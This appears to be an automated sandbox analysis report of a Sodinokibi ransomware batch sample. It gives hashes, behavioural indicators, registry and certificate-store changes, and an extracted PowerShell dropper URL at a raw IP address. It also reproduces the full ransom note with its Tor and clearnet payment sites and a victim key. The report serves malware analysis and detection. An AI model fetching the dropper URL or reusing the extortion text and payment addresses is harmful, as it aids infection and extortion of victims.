sodinokibi | 7a29462b5b646f444451bd24baa06480abd3c1a39c33477d1530d1e21f4f7aa6

General

Target

AxRJbHcj.bat
Size

191B
MD5

c8057644f33461fab278b0bf3c6a103d
SHA1

5d669ea802108937803c3e530643811de7df3ad6
SHA256

7a29462b5b646f444451bd24baa06480abd3c1a39c33477d1530d1e21f4f7aa6
SHA512

03ac8f9aca2a2ed297a2755c8c1c875ec2eb5b98c2ed7cbab98e51a87bcfc31ed97214636964521adcf8d5475baebea60bde8253b76e38e9fa168d9dab2ff8cf

Score

10^/10

ransomware evasion spyware trojan sodinokibi persistence

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://185.103.242.78/pastes/AxRJbHcj

Extracted

Path

C:\54x5b562w7-readme.txt

Family

sodinokibi

Ransom Note

---=== Welcome. Again. ===--- [+] Whats Happen? [+] Your files are encrypted, and currently unavailable. You can check it: all files on your system has extension 54x5b562w7. By the way, everything is possible to recover (restore), but you need to follow our instructions. Otherwise, you cant return your data (NEVER). [+] What guarantees? [+] Its just a business. We absolutely do not care about you and your deals, except getting benefits. If we do not do our work and liabilities - nobody will not cooperate with us. Its not in our interests. To check the ability of returning files, You should go to our website. There you can decrypt one file for free. That is our guarantee. If you will not cooperate with our service - for us, its does not matter. But you will lose your time and data, cause just we have the private key. In practice - time is much more valuable than money. [+] How to get access on website? [+] You have two ways: 1) [Recommended] Using a TOR browser! a) Download and install TOR browser from this site: https://torproject.org/ b) Open our website: http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/206011A88ACD6C74 2) If TOR blocked in your country, try to use VPN! But you can use our secondary website. For this: a) Open your any browser (Chrome, Firefox, Opera, IE, Edge) b) Open our secondary website: http://decryptor.cc/206011A88ACD6C74 Warning: secondary website can be blocked, thats why first variant much better and more available. When you open our website, put the following data in the input form: Key: SaPSZV0GmEjz4qEe2oJH1GQ/lBxAucR5mGwjwqfIjmIar+Quz/e185eYJsq/um1A 09aV1DbdkL7atnRq4yr6Fq2kOxe/cE8IJlydHahKUSH4BR5sriXI0wWMMWvnl6SB yNyRwZKnkDzYYmHBVFtRWjCcHHZ1HsNgfzktB8gVAWm1ZrWxQDXshYP+ik77UZZp JJHOFW7k40ZaXH9mcqO0x4RgdBhJvV5z8qvXXKmGjscVwwI9TJkMsHd4v7Xme63s i8FZVtEIH0rwQT5IJo/kfpIVULCQpn/GyVKc3YHeVovo3g/pebAnbsjaBR1wDhhQ 1IhMdj2wcUpRj5KkCI34yssdRKt/qa0k1BSDEglQng76sZ7QoflbW8RqYFGFnAMo sgS0J7DNwGdylxpb1YST/QL8cmYLe0NdRKhWC6w+NqU1a6OSxQxdyNDfE3jx0cLN 1qKIsWfWcMAnHGsAbE/e6jx6EcJiDHRxPfAlx5xT/T6QKLz8DefNHB5BhtPlL7dR ZxbXT+MYczxrPXghw3CK+2j6asSDM0aeC1ad7PjPXcBS+rf2ADr/B7WemyE8r53D sHHoFh2cOfLJn1y0KZvp2nvs79rlEzRUOqYtm0ooUByBi/kRHRqk76yQ0X1Ekzw4 6VNLyzkOaE31r7Vwb9i6Pb8qGA+n/2H5Yg1O9F0E3fs3xw7ECUZk3TXYG2LIeQeN 578iYeWoDWGk3gTXzIwkNAQg84ErCtTbfAmW82uR0t3bhuVBCdUcbax6R73j+Pu9 pVA/TsSGbLCYmnZUB7i9hIBY6YR/HHr/mGzR4pkiNVknyH3LX0xaUQgiKUs96FaH 5WFRV805bnCMuaeccmsOoIQBzjfftqLdmtAM2enDHgUcJr3fbXAjTcPAEX52C43D G0upONpiV4+8DtimZAZ4hJVh3fiWelM/rSv4jAl4KDGCz7eLf6hQmt7bRerEbUoV eBkkZBq5g+r7ogL8X4yCi5X0wlB+C4XTXDJByVosPUJqQuieHU5dA3KiNtbNs96a G0uswfunHSAwZ6Puy+KaGFTbjd0Pq3Faxs9bYHKpdtPIih67KvfWams/+nlnR2lz F0o1njr75Cb6sSFleyYywRAtm64Z4ipij+nHrpkEzOuwECgpkG+bYakLqiwTU0W7 UsP2biTe4jmPZWa5vBnXOBat+LPQo8fsxRj1N/tNKzKOgV4jdCQsxPoja5rDzrEy +4KPWVb7xMsEfmOWADhQBAMvTj1eCm7QMQQxRWncRg6NywLwkGlgkKAhqzxcXasc AxA/U8Z6DTQi40yPaK1dbU7Cd14z8Y+O9Tln2o979lhFwNsO+52g8w== ----------------------------------------------------------------------------------------- !!! DANGER !!! DONT try to change files by yourself, DONT use any third party software for restoring your data or antivirus solutions - its may entail damage of the private key and, as result, The Loss all data. !!! !!! !!! ONE MORE TIME: Its in your interests to get your files back. From our side, we (the best specialists) make everything for restoring, but please should not interfere. !!! !!! !!!

URLs

http://aplebzu47wgazapdqks6vrcv6zcnjppkbxbr6wketf56nf6aq2nmyoyd.onion/206011A88ACD6C74

http://decryptor.cc/206011A88ACD6C74

Signatures

Suspicious use of AdjustPrivilegeToken 6 IoCs

Processes:

powershell.exepowershell.exevssvc.exe

description	pid	process
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	1892	powershell.exe
Token: SeDebugPrivilege	2000	powershell.exe
Token: SeBackupPrivilege	1544	vssvc.exe
Token: SeRestorePrivilege	1544	vssvc.exe
Token: SeAuditPrivilege	1544	vssvc.exe

Suspicious behavior: EnumeratesProcesses 5 IoCs

Processes:

powershell.exepowershell.exe

pid process

1892 powershell.exe
1892 powershell.exe
1892 powershell.exe
2000 powershell.exe
2000 powershell.exe

pid	process
1892	powershell.exe
1892	powershell.exe
1892	powershell.exe
2000	powershell.exe
2000	powershell.exe

Sets desktop wallpaper using registry 2 TTPs 1 IoCs

ransomware

Defacement

T1491

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\x4c15k36.bmp"	powershell.exe

Modifies system certificate store 2 TTPs 16 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

Processes:

powershell.exe

description	ioc	process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868\Blob = 0400000001000000100000001d3554048578b03f42424dbf20730a3f0f000000010000001400000009b9105c5bba24343ca7f341c624e183f6ee7c1b19000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c03000000010000001400000002faf3e291435468607857694df5e45b688518681d000000010000001000000006f9583c00a763c23fb9e065a3366d55140000000100000014000000adbd987a34b426f7fac42654ef03bde024cb541a620000000100000020000000687fa451382278fff0c8b11f8d43d576671c6eb2bceab413fb83d965d06d2ff20b00000001000000260000005300650063007400690067006f0020002800410064006400540072007500730074002900000053000000010000002600000030243022060c2b06010401b231010201050130123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b06010505070308060a2b0601040182370a030406082b0601050507030606082b0601050507030720000000010000003a040000308204363082031ea003020102020101300d06092a864886f70d0101050500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f7430820122300d06092a864886f70d01010105000382010f003082010a0282010100b7f71a33e6f200042d39e04e5bed1fbc6c0fcdb5fa23b6cede9b113397a4294c7d939fbd4abc93ed031ae38fcfe56d505ad69729945a80b0497adb2e95fdb8cabf37382d1e3e9141ad7056c7f04f3fe8329e74cac89054e9c65f0f789d9a403c0eac61aa5e148f9e87a16a50dcd79a4eaf05b3a671949c71b350600ac7139d38078602a8e9a869261890ab4cb04f23ab3a4f84d8dfce9fe1696fbbd742d76b44e4c7adee6d415f725a710837b37965a459a09437f7002f0dc29272dad03872db14a845c45d2a7db7b4d6c4eeaccd1344b7c92bdd430025fa61b9696a582311b7a7338f567559f5cd29d746b70a2b65b6d3426f15b2b87bfbefe95d53d5345a270203010001a381dc3081d9301d0603551d0e04160414adbd987a34b426f7fac42654ef03bde024cb541a300b0603551d0f040403020106300f0603551d130101ff040530030101ff3081990603551d2304819130818e8014adbd987a34b426f7fac42654ef03bde024cb541aa173a471306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74820101300d06092a864886f70d01010505000382010100b09be08525c2d623e20f9606929d41989cd9847981d91e5b14072336658fb0d877bbac416c47608351b0f9323de7fcf62613c78016a5bf5afc87cf787989219ae24c070a8635bcf2de51c4d296b7dc7e4eee70fd1c39eb0c0251142d8ebd16e0c1df4675e724adecf442b48593701067ba9d06354a18d32b7acc5142a17a63d1e6bba1c52bc236be130de6bd637e797ba7090d40ab6add8f8ac3f6f68c1a420551d445f59fa76221681520433c99e77cbd24d8a9911773883f561b313818b4710f9acdc80e9e8e2e1be18c9883cb1f31f1444cc604734976600fc7f8bd17806b2ee9cc4c0e5a9a790f200a2ed59e63261e559294d882175a7bd0bcc78f4e8604	powershell.exe
Set value (data)	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Software\Microsoft\SystemCertificates\CA\Certificates\EAB040689A0D805B5D6FD654FC168CFF00B78BE3\Blob = 030000000100000014000000eab040689a0d805b5d6fd654fc168cff00b78be31400000001000000140000005379bf5aaa2b4acf5480e1d89bc09df2b20366cb040000000100000010000000db78cbd190952735d940bc80ac2432c00f0000000100000030000000435fe6564241d6b3828352ef9be443d511c21f0afb325c4038a5820f00d87774a8ef2193ddaae065b2572faf2bf0ee63190000000100000010000000ea6089055218053dd01e37e1d806eedf18000000010000001000000045ed9bbc5e43d3b9ecd63c060db78e5c20000000010000007b050000308205773082045fa003020102021013ea28705bf4eced0c36630980614336300d06092a864886f70d01010c0500306f310b300906035504061302534531143012060355040a130b416464547275737420414231263024060355040b131d41646454727573742045787465726e616c20545450204e6574776f726b312230200603550403131941646454727573742045787465726e616c20434120526f6f74301e170d3030303533303130343833385a170d3230303533303130343833385a308188310b3009060355040613025553311330110603550408130a4e6577204a6572736579311430120603550407130b4a65727365792043697479311e301c060355040a131554686520555345525452555354204e6574776f726b312e302c06035504031325555345525472757374205253412043657274696669636174696f6e20417574686f7269747930820222300d06092a864886f70d01010105000382020f003082020a028202010080126517360ec3db08b3d0ac570d76edcd27d34cad508361e2aa204d092d6409dcce899fcc3da9ecf6cfc1dcf1d3b1d67b3728112b47da39c6bc3a19b45fa6bd7d9da36342b676f2a93b2b91f8e26fd0ec162090093ee2e874c918b491d46264db7fa306f188186a90223cbcfe13f087147bf6e41f8ed4e451c61167460851cb8614543fbc33fe7e6c9cff169d18bd518e35a6a766c87267db2166b1d49b7803c0503ae8ccf0dcbc9e4cfeaf0596351f575ab7ffcef93db72cb6f654ddc8e7123a4dae4c8ab75c9ab4b7203dca7f2234ae7e3b68660144e7014e46539b3360f794be5337907343f332c353efdbaafe744e69c76b8c6093dec4c70cdfe132aecc933b517895678bee3d56fe0cd0690f1b0ff325266b336df76e47fa7343e57e0ea566b1297c3284635589c40dc19354301913acd37d37a7eb5d3a6c355cdb41d712daa9490bdfd8808a0993628eb566cf2588cd84b8b13fa4390fd9029eeb124c957cf36b05a95e1683ccb867e2e8139dcc5b82d34cb3ed5bffdee573ac233b2d00bf3555740949d849581a7f9236e651920ef3267d1c4d17bcc9ec4326d0bf415f40a94444f499e757879e501f5754a83efd74632fb1506509e658422e431a4cb4f0254759fa041e93d426464a5081b2debe78b7fc6715e1c957841e0f63d6e962bad65f552eea5cc62808042539b80e2ba9f24c971c073f0d52f5edef2f820f0203010001a381f43081f1301f0603551d23041830168014adbd987a34b426f7fac42654ef03bde024cb541a301d0603551d0e041604145379bf5aaa2b4acf5480e1d89bc09df2b20366cb300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff30110603551d20040a300830060604551d200030440603551d1f043d303b3039a037a0358633687474703a2f2f63726c2e7573657274727573742e636f6d2f416464547275737445787465726e616c4341526f6f742e63726c303506082b0601050507010104293027302506082b060105050730018619687474703a2f2f6f6373702e7573657274727573742e636f6d300d06092a864886f70d01010c050003820101009365f63783950f5ec3821c1fd677e73c8ac0aa09f0e90b26f1e0c26a75a1c779c9b95260c829120ef0ad03d609c476dfe5a68195a746da8257a99592c5b68f03226c3377c17b32176e07ce5a14413a05241bf614063ba825240ebbcc2a75ddb970413f7cd0633621071f46ff60a491e167bcde1f7e1914c9636791ea67076bb48f8bc06e437dc3a1806cb21ebc53857ddc90a1a4bc2def4672573505bfbb46bb6e6d3799b6ff239291c66e40f88f2956ea5fd55f1453acf04f61eaf722cca7560be2b8341f26d97b1905683fba3cd43806a2d3e68f0ee3b4716d4042c584b440952bf465a04879f61d8163969d4f75e0f87ce48ea9d1f2ad8ab38cc721cdc2ef	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DAC9024F54D8F6DF94935FB1732638CA6AD77C13	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\02FAF3E291435468607857694DF5E45B68851868	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD\Blob = 040000000100000010000000c5dfb849ca051355ee2dba1ac33eb0280f00000001000000200000005229ba15b31b0c6f4cca89c2985177974327d1b689a3b935a0bd975532af22ab190000000100000010000000d0fd3c9c380d7b65e26b9a3fedd39b8f030000000100000014000000d69b561148f01c77c54578c10926df5b856976ad1d000000010000001000000001728e1ecf7a9d86fb3cec8948aba9531400000001000000140000008ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc620000000100000020000000cbb522d7b7f127ad6a0113865bdf1cd4102e7d0759af635a7cf4720dc963c53b5300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520033000000090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703072000000001000000630300003082035f30820247a003020102020b04000000000121585308a2300d06092a864886f70d01010b0500304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e301e170d3039303331383130303030305a170d3239303331383130303030305a304c3120301e060355040b1317476c6f62616c5369676e20526f6f74204341202d20523331133011060355040a130a476c6f62616c5369676e311330110603550403130a476c6f62616c5369676e30820122300d06092a864886f70d01010105000382010f003082010a0282010100cc2576907906782216f5c083b684ca289efd057611c5ad8872fc460243c7b28a9d045f24cb2e4be1608246e152ab0c8147706cdd64d1ebf52ca30f823d0c2bae97d7b614861079bb3b1380778c08e149d26a622f1f5efa9668df892795389f06d73ec9cb26590d73deb0c8e9260e8315c6ef5b8bd20460ca49a628f6693bf6cbc82891e59d8a615737ac7414dc74e03aee722f2e9cfbd0bbbff53d00e10633e8822bae53a63a16738cdd410e203ac0b4a7a1e9b24f902e3260e957cbb904926868e538266075b29f77ff9114efae2049fcad401548d1023161195eb897efad77b7649a7abf5fc113ef9b62fb0d6ce0546916a903da6ee983937176c6698582170203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e041604148ff04b7fa82e4524ae4d50fa639a8bdee2dd1bbc300d06092a864886f70d01010b050003820101004b40dbc050aafec80ceff796544549bb96000941acb3138686280733ca6be674b9ba002daea40ad3f5f1f10f8abf73674a83c7447b78e0af6e6c6f03298e333945c38ee4b9576caafc1296ec53c62de4246cb99463fbdc536867563e83b8cf3521c3c968fecedac253aacc908ae9f05d468c95dd7a58281a2f1ddecd0037418fed446dd75328977ef367041e15d78a96b4d3de4c27a44c1b737376f41799c21f7a0ee32d08ad0a1c2cff3cab550e0f917e36ebc35749bee12e2d7c608bc3415113239dcef7326b9401a899e72c331f3a3b25d28640ce3b2c8678c9612f14baeedb556fdf84ee05094dbd28d872ced36250651eeb92978331d9b3b5ca47583f5f	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436\Blob = 04000000010000001000000079e4a9840d7d3a96d7c04fe2434c892e0f0000000100000014000000b34ddd372ed92e8f2abfbb9e20a9d31f204f194b1900000001000000100000000f3a0527d242de2dc98e5cfcb1e991ee030000000100000014000000a8985d3a65e5e5c4b2d7d66d40c6dd2fb19c54361d000000010000001000000059779e39e21a2e3dfced6857ed5c5fd90b000000010000001200000044006900670069004300650072007400000014000000010000001400000003de503556d14cbb66f0a3e21b1bc397b23dd1556200000001000000200000004348a0e9444c78cb265e058d5e8944b4d84f9662bd26db257f8934a443c701615300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c0090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000b3030000308203af30820297a0030201020210083be056904246b1a1756ac95991c74a300d06092a864886f70d01010505003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204341301e170d3036313131303030303030305a170d3331313131303030303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100e23be11172dea8a4d3a357aa50a28f0b7790c9a2a5ee12ce965b010920cc0193a74e30b753f743c46900579de28d22dd870640008109cece1b83bfdfcd3b7146e2d666c705b37627168f7b9e1e957deeb748a308dad6af7a0c3906657f4a5d1fbc17f8abbeee28d7747f7a78995985686e5c23324bbf4ec0e85a6de370bf7710bffc01f685d9a844105832a97518d5d1a2be47e2276af49a33f84908608bd45fb43a84bfa1aa4a4c7d3ecf4f5f6c765ea04b37919edc22e66dce141a8e6acbfecdb3146417c75b299e32bff2eefad30b42d4abb74132da0cd4eff881d5bb8d583fb51be84928a270da3104ddf7b216f24c0a4e07a8ed4a3d5eb57fa390c3af270203010001a3633061300e0603551d0f0101ff040403020186300f0603551d130101ff040530030101ff301d0603551d0e0416041403de503556d14cbb66f0a3e21b1bc397b23dd155301f0603551d2304183016801403de503556d14cbb66f0a3e21b1bc397b23dd155300d06092a864886f70d01010505000382010100cb9c37aa4813120afadd449c4f52b0f4dfae04f5797908a32418fc4b2b84c02db9d5c7fef4c11f58cbb86d9c7a74e79829ab11b5e370a0a1cd4c8899938c9170e2ab0f1cbe93a9ff63d5e40760d3a3bf9d5b09f1d58ee353f48e63fa3fa7dbb466df6266d6d16e418df22db5ea774a9f9d58e22b59c04023ed2d2882453e7954922698e08048a837eff0d6796016deace80ecd6eac4417382f49dae1453e2ab93653cf3a5006f72ee8c457496c612118d504ad783c2c3a806ba7ebaf1514e9d889c1b9386ce2916c8aff64b977255730c01b24a3e1dce9df477cb5b424080530ec2dbd0bbf45bf50b9a9f3eb980112adc888c698345f8d0a3cc6e9d595956dde	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D69B561148F01C77C54578C10926DF5B856976AD	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B51C067CEE2B0C3DF855AB2D92F4FE39D4E70F0E\Blob = 040000000100000010000000d63981c6527e9669fcfcca66ed05f2960f000000010000002000000071b437f087f3700ffd4e2fa46f42b6b810d7bf19adfedf951c023edd65b50b0519000000010000001000000060e2dc65295f1062e558f3fef235ed3c030000000100000014000000b51c067cee2b0c3df855ab2d92f4fe39d4e70f0e1d000000010000001000000054e2cd85ba79cda018fed9e6a863aa461400000001000000140000007c0c321fa7d9307fc47d68a362a8a1ceab075b276200000001000000200000002ce1cb0bf9d2f9e102993fbe215152c3b2dd0cabde1c68e5319b839154dbb7f553000000010000002500000030233021060b6086480186fd6e0107170330123010060a2b0601040182373c0101030200c0090000000100000054000000305206082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b06010505070308060a2b0601040182370a030406082b0601050507030606082b060105050703070b000000010000005400000053007400610072006600690065006c006400200052006f006f007400200043006500720074006900660069006300610074006500200041007500740068006f0072006900740079002000132020004700320000002000000001000000e1030000308203dd308202c5a003020102020100300d06092a864886f70d01010b050030818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d204732301e170d3039303930313030303030305a170d3337313233313233353935395a30818f310b30090603550406130255533110300e060355040813074172697a6f6e61311330110603550407130a53636f74747364616c6531253023060355040a131c537461726669656c6420546563686e6f6c6f676965732c20496e632e3132303006035504031329537461726669656c6420526f6f7420436572746966696361746520417574686f72697479202d20473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bdedc103fcf68ffc02b16f5b9f48d99d79e2a2b703615618c347b6d7ca3d352e8943f7a1699bde8a1afd13209cb44977322956fdb9ec8cdd22fa72dc276197eef65a84ec6e19b9892cdc845bd574fb6b5fc589a51052894655f4b8751ce67fe454ae4bf85572570219f8177159eb1e280774c59d48be6cb4f4a4b0f364377992c0ec465e7fe16d534c62afcd1f0b63bb3a9dfbfc7900986174cf26824063f3b2726a190d99cad40e75cc37fb8b89c159f1627f5fb35f6530f8a7b74d765a1e765e34c0e89656998ab3f07fa4cdbddc32317c91cfe05f11f86baa495cd19994d1a2e3635b0976b55662e14b741d96d426d4080459d0980e0ee6defcc3ec1f90f10203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020106301d0603551d0e041604147c0c321fa7d9307fc47d68a362a8a1ceab075b27300d06092a864886f70d01010b050003820101001159fa254f036f94993b9a1f828539d47605945ee128936d625d09c2a0a8d4b07538f1346a9de49f8a862651e62cd1c62d6e95204a9201ecb88a677b31e2672e8c9503262e439d4a31f60eb50cbbb7e2377f22ba00a30e7b52fb6bbb3bc4d379514ecd90f4670719c83c467a0d017dc558e76de68530179a24c410e004f7e0f27fd4aa0aff421d37ed94e5645912207738d3323e3881759673fa688fb1cbce1fc5ecfa9c7ecf7eb1f1072db6fcbfcaa4bfd097054abcea18280290bd5478092171d3d17d1dd916b0a9613dd00a0022fcc77bcb0964450b3b4081f77d7c32f598ca588e7d2aee90597364f936745e25a1f566052e7f3915a92afb508b8e8569f4	powershell.exe
Key created	\REGISTRY\USER\S-1-5-21-1848298919-2336104428-4012071465-1000\Software\Microsoft\SystemCertificates\CA\Certificates\EAB040689A0D805B5D6FD654FC168CFF00B78BE3	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\A8985D3A65E5E5C4B2D7D66D40C6DD2FB19C5436	powershell.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\B1BC968BD4F49D622AA89A81F2150152A41D829C\Blob = 0400000001000000100000003e455215095192e1b75d379fb187298a0f00000001000000140000005a6d07b6371d966a2fb6ba92828ce5512a49513d190000000100000010000000a823b4a20180beb460cab955c24d7e21030000000100000014000000b1bc968bd4f49d622aa89a81f2150152a41d829c7e00000001000000080000000000042beb77d5017f000000010000000c000000300a06082b060105050703091d00000001000000100000006ee7f3b060d10e90a31ba3471b999236140000000100000014000000607b661a450d97ca89502f7d04cd34a8fffcfd4b620000000100000020000000ebd41040e4bb3ec742c9e381d31ef2a41a48b6685c96e7cef3c1df6cd4331c995300000001000000230000003021301f06092b06010401a032010130123010060a2b0601040182373c0101030200c00b000000010000003000000047006c006f00620061006c005300690067006e00200052006f006f00740020004300410020002d002000520031000000090000000100000068000000306606082b0601050507030106082b0601050507030206082b0601050507030306082b0601050507030406082b0601050507030806082b06010505070309060a2b0601040182370a030406082b0601050507030606082b0601050507030706082b06010505080202200000000100000079030000308203753082025da003020102020b040000000001154b5ac394300d06092a864886f70d01010505003057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f74204341301e170d3938303930313132303030305a170d3238303132383132303030305a3057310b300906035504061302424531193017060355040a1310476c6f62616c5369676e206e762d73613110300e060355040b1307526f6f74204341311b301906035504031312476c6f62616c5369676e20526f6f7420434130820122300d06092a864886f70d01010105000382010f003082010a0282010100da0ee6998dcea3e34f8a7efbf18b83256bea481ff12ab0b9951104bdf063d1e26766cf1cddcf1b482bee8d898e9aaf298065abe9c72d12cbab1c4c7007a13d0a30cd158d4ff8ddd48c50151cef50eec42ef7fce952f2917de06dd535308e5e4373f241e9d56ae3b2893a5639386f063c88695b2a4dc5a754b86c89cc9bf93ccae5fd89f5123c927896d6dc746e934461d18dc746b2750e86e8198ad56d6cd5781695a2e9c80a38ebf224134f73549313853a1bbc1e34b58b058cb9778bb1db1f2091ab09536e90ce7b3774b97047912251631679aeb1ae412608c8192bd146aa48d6642ad78334ff2c2ac16c19434a0785e7d37cf62168efeaf2529f7f9390cf0203010001a3423040300e0603551d0f0101ff040403020106300f0603551d130101ff040530030101ff301d0603551d0e04160414607b661a450d97ca89502f7d04cd34a8fffcfd4b300d06092a864886f70d01010505000382010100d673e77c4f76d08dbfecbaa2be34c52832b57cfc6c9c2c2bbd099e53bf6b5eaa1148b6e508a3b3ca3d614dd34609b33ec3a0e363551bf2baefad39e143b938a3e62f8a263befa05056f9c60afd38cdc40b705194979804dfc35f94d515c914419cc45d7564150dff5530ec868fff0def2cb96346f6aafcdfbc69fd2e1248649ae095f0a6ef298f01b115b50c1da5fe692c6924781eb3a71c7162eecac897ac175d8ac2f847866e2ac4563195d06789852bf96ca65d469d0caa82e49951dd70b7db563d61e46ae15cd6f6fe3dde41cc07ae6352bf5353f42be9c7fdb6f7825f85d24118db81b3041cc51fa4806f1520c9de0c880a1dd66655e2fc48c9292669e0	powershell.exe
Set value (data)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\DF3C24F9BFD666761B268073FE06D1CC8D4F82A4\Blob = 040000000100000010000000e4a68ac854ac5242460afd72481b2a440f00000001000000200000004b4eb4b074298b828b5c003095a10b4523fb951c0c88348b09c53e5baba408a319000000010000001000000014c3bd3549ee225aece13734ad8ca0b8030000000100000014000000df3c24f9bfd666761b268073fe06d1cc8d4f82a41d00000001000000100000007dc30bc974695560a2f0090a6545556c1400000001000000140000004e2254201895e6e36ee60ffafab912ed06178f39620000000100000020000000cb3ccbb76031e5e0138f8dd39a23f9de47ffc35e43c1144cea27d46a5ab1cb5f5300000001000000230000003021301f06096086480186fd6c020130123010060a2b0601040182373c0101030200c00b000000010000003000000044006900670069004300650072007400200047006c006f00620061006c00200052006f006f0074002000470032000000090000000100000034000000303206082b0601050507030106082b0601050507030206082b0601050507030406082b0601050507030306082b060105050703082000000001000000920300003082038e30820276a0030201020210033af1e6a711a9a0bb2864b11d09fae5300d06092a864886f70d01010b05003061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f74204732301e170d3133303830313132303030305a170d3338303131353132303030305a3061310b300906035504061302555331153013060355040a130c446967694365727420496e6331193017060355040b13107777772e64696769636572742e636f6d3120301e06035504031317446967694365727420476c6f62616c20526f6f7420473230820122300d06092a864886f70d01010105000382010f003082010a0282010100bb37cd34dc7b6bc9b26890ad4a75ff46ba210a088df51954c9fb88dbf3aef23a89913c7ae6ab061a6bcfac2de85e092444ba629a7ed6a3a87ee054752005ac50b79c631a6c30dcda1f19b1d71edefdd7e0cb948337aeec1f434edd7b2cd2bd2ea52fe4a9b8ad3ad499a4b625e99b6b00609260ff4f214918f76790ab61069c8ff2bae9b4e992326bb5f357e85d1bcd8c1dab95049549f3352d96e3496ddd77e3fb494bb4ac5507a98f95b3b423bb4c6d45f0f6a9b29530b4fd4c558c274a57147c829dcd7392d3164a060c8c50d18f1e09be17a1e621cafd83e510bc83a50ac46728f67314143d4676c387148921344daf0f450ca649a1babb9cc5b1338329850203010001a3423040300f0603551d130101ff040530030101ff300e0603551d0f0101ff040403020186301d0603551d0e041604144e2254201895e6e36ee60ffafab912ed06178f39300d06092a864886f70d01010b05000382010100606728946f0e4863eb31ddea6718d5897d3cc58b4a7fe9bedb2b17dfb05f73772a3213398167428423f2456735ec88bff88fb0610c34a4ae204c84c6dbf835e176d9dfa642bbc74408867f3674245ada6c0d145935bdf249ddb61fc9b30d472a3d992fbb5cbbb5d420e1995f534615db689bf0f330d53e31e28d849ee38adada963e3513a55ff0f970507047411157194ec08fae06c49513172f1b259f75f2b18e99a16f13b14171fe882ac84f102055d7f31445e5e044f4ea879532930efe5346fa2c9dff8b22b94bd90945a4dea4b89a58dd1b7d529f8e59438881a49e26d56faddd0dc6377ded03921be5775f